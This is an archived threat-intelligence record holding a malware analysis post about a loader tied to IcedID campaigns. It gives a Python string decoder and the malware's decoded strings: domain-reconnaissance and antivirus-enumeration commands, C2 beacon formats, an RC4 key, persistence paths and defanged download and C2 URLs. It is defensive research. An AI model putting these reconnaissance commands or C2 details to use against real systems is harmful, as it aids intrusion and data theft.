{
	"id": "2a6f02f9-d599-4b68-9f59-2f49cc98e994",
	"created_at": "2026-04-06T00:13:26.598071Z",
	"updated_at": "2026-04-10T03:21:15.437153Z",
	"deleted_at": null,
	"sha1_hash": "48e3f3c33fcad53a272eb96ab977137d547f4362",
	"title": "IcedID gets Loaded",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 820892,
	"plain_text": "IcedID gets Loaded\r\nBy Jason Reaves\r\nPublished: 2023-10-27 · Archived: 2026-04-05 17:41:40 UTC\r\nBy: Joshua Platt and Jason Reaves\r\nWhile investigating a recent IcedID campaign leveraging GitLab:\r\nhxxps://gitlab.]com/group9652040/my1/-/raw/main/2.exe\r\nWe noticed that the imphash for the sample had an overlap with another sample:\r\nPress enter or click to view image in full size\r\nRef: https://www.virustotal.com/gui/search/imphash%253Ace088b62574105896ea14183bc034940/files\r\nAnd that new sample was talking to a different domain:\r\nPress enter or click to view image in full size\r\nRef:\r\nhttps://www.virustotal.com/gui/file/6ae543b0a3380779b65bff8c3ca0267f741173aed0d35265d6c92c0298fb924c/relations\r\nAfter unpacking the sample a few strings can be seen that would allude to some sort of system and network profiler:\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 1 of 9\n\n\u0026ipconfig=\r\n\u0026systeminfo=\r\n\u0026domain_trusts=\r\n\u0026domain_trusts_all=\r\n\u0026net_view_all_domain=\r\n\u0026net_view_all=\r\n\u0026net_group=\r\n\u0026wmic=\r\n\u0026net_config_ws=\r\n\u0026net_wmic_av=\r\n\u0026whoami_group=\r\nWhen diving into the binary however we can see that most of the strings are in fact encoded, the first thing the decoding\r\nroutine does is get the length of the string from the first 6 bytes(first DWORD is initial XOR seed, next WORD value is xor\r\nencoded length):\r\nNext is the XOR loop:\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 2 of 9\n\nThe initial XOR seed value gets passed to a PRNG like function:\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 3 of 9\n\nAfter reversing the algorithm:\r\ndef mask(a):\r\n return(a \u0026 0xffffffff)\r\ndef prng2(seed):\r\n temp = mask((seed + 0x2e59))\r\n temp2 = temp \u003e\u003e 1\r\n temp = mask(temp \u003c\u003c 0x1f)\r\n temp |= temp2\r\n temp2 = temp \u003e\u003e 1\r\n temp = mask(temp \u003c\u003c 0x1f)\r\n temp |= temp2\r\n temp2 = temp \u003e\u003e 2\r\n temp = mask(temp \u003c\u003c 0x1e)\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 4 of 9\n\ntemp |= temp2\r\n temp ^= 0x6387\r\n temp ^= 0x769a\r\n temp2 = mask(temp \u003c\u003c 2)\r\n temp \u003e\u003e= 0x1e\r\n temp |= temp2\r\n temp2 = mask(temp \u003c\u003c 1)\r\n temp \u003e\u003e= 0x1f\r\n temp |= temp2\r\n return(temp)\r\ndef decode(s):\r\n (seed, l) = struct.unpack_from('\u003cIH', s)\r\n l = (l ^ seed) \u0026 0xffff\r\n if l \u003e len(s):\r\n return('')\r\n temp = bytearray(s[6:6+l])\r\n for i in range(l):\r\n seed = prng2(seed)\r\n temp[i] = (temp[i] ^ seed) \u0026 0xff\r\n return(temp)\r\nWe can decode all the strings:\r\n/c nltest /domain_trusts /all_trusts\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net view /all /domain\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net view /all\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net group \"Domain Admins\" /domain\r\nC:\\Windows\\System32\\cmd.exe\r\n/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nC:\\Windows\\System32\\wbem\\wmic.exe\r\n/c net config workstation\r\nC:\\Windows\\System32\\cmd.exe\r\n/c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr\r\nC:\\Windows\\System32\\cmd.exe\r\n/c whoami /groups\r\nC:\\Windows\\System32\\cmd.exe\r\n/c ipconfig /all\r\nC:\\Windows\\System32\\cmd.exe\r\n/c systeminfo\r\nC:\\Windows\\System32\\cmd.exe\r\n/c nltest /domain_trusts\r\nC:\\Windows\\System32\\cmd.exe\r\n.dll\r\n.exe\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 5 of 9\n\n\"%s\"\r\nrundll32.exe\r\n\"%s\", DllRegisterServer\r\n:wtfbbq\r\nrunnung\r\n%d\r\n%s%s\r\n%s\\%d.dll\r\n%d.dat\r\n%s\\%s\r\ninit -zzzz=\"%s\\%s\"\r\nfront\r\n/files/\r\ntest\r\n.exe\r\ncurl/7.88.1\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nPOST\r\nGET\r\nCOMMAND\r\nERROR\r\n12345\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\nCLEARURL\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\nURLS\r\n%x%x\r\nPT0S\r\n\u0026mac=\r\n%02x:%02x:%02x:%02x:%02x:%02x;\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n\\*.dll\r\n%04X%04X%04X%04X%08X%04X\r\n%04X%04X%04X%04X%08X%04X\r\n\\Registry\\Machine\\\r\nAppData\r\nDesktop\r\nStartup\r\nPersonal\r\nLocal AppData\r\n%s%d.dll\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\r\nhxxps://aplihartom[.com/live/\r\nC:\\WINDOWS\\SYSTEM32\\rundll32.exe %s,%s\r\nC:\\WINDOWS\\SYSTEM32\\rundll32.exe %s\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nLogonTrigger\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 6 of 9\n\nhxxps://fasestarkalim[.com/live/\r\n%s%d.exe\r\nTimeTrigger\r\nPT1H%02dM\r\n%04d-%02d-%02dT%02d:%02d:%02d\r\nURLS|%d|%s\r\nURLS\r\nAfter mapping the decoded strings back into the binary we noticed not all of them are used.\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThe loader appears to currently maintain persistence through a task object:\r\nWindows\\System32\\Tasks\\Updater\r\nAlong with a hardcoded location that the binary will move itself to:\r\n\\AppData\\Roaming\\Custom_update\\update_data.dat\r\n\\AppData\\Roaming\\Custom_update\r\n\\AppData\\Roaming\\Custom_update\\Update_[0-9a-f]+.exe\r\nHardcoded mutex:\r\nrunnung\r\nFrom the network side both the User-Agent and the Content-Type headers in the HTTP traffic are hardcoded:\r\nPOST /live/ HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nHost: aplihartom.com\r\nContent-Length: 208\r\nCache-Control: no-cache\r\nThe C2 traffic itself is BASE64 encoded and RC4 encrypted using the decoded string ‘12345’ as the key. After being\r\ndecrypted the bot will parse the commands given:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 7 of 9\n\nThe command instruction comes with a number preceding a URL which can have front:// at the beginning, the front:// gets\r\nreplaced by the active C2 domain to download the file in that case. The preceding numbers mostly control how the\r\ndownloaded data will be leveraged and executed but can also inform the bot to simply exit.\r\nCommand table\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 8 of 9\n\nSo far the only downloaded files that have been seen are a sysinfo binary which collects the same data as the initial loader\r\nwith the exception of also querying ‘ifconfig[.me’ for the ‘realip’, and a bp.dat file which can be decrypted using an IcedID\r\ndecryption script[3].\r\nConfig information about this loader:\r\nGroup: 2949673345\r\nVersion: 1.1\r\nC2: fasestarkalim[.com/live/ , aplihartom[.com/live/\r\nDownloaded C2 list: wikistarhmania[.com/live/ , drendormedia[.com/live/\r\nThanks @Antelox and @xorsthingsv2 for fix on command table.\r\nReferences\r\n1: https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid\r\n2: https://tria.ge/231008-vn4fhaef3x/behavioral2\r\n3: https://github.com/embee-research/Icedid-file-decryptor/blob/main/icedid_decrypt.py\r\nSource: https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39"
	],
	"report_names": [
		"icedid-gets-loaded-af073b7b6d39"
	],
	"threat_actors": [],
	"ts_created_at": 1775434406,
	"ts_updated_at": 1775791275,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/48e3f3c33fcad53a272eb96ab977137d547f4362.pdf",
		"text": "https://archive.orkl.eu/48e3f3c33fcad53a272eb96ab977137d547f4362.txt",
		"img": "https://archive.orkl.eu/48e3f3c33fcad53a272eb96ab977137d547f4362.jpg"
	}
}